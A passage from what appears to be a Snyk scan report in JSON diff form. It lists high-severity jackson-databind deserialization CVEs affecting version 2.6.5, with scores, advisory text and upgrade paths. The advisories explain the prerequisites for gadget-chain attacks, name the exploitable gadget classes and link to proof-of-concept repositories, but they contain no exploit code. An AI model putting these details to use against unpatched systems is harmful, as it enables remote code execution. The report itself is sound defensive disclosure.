"Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. 
Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + 
"url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
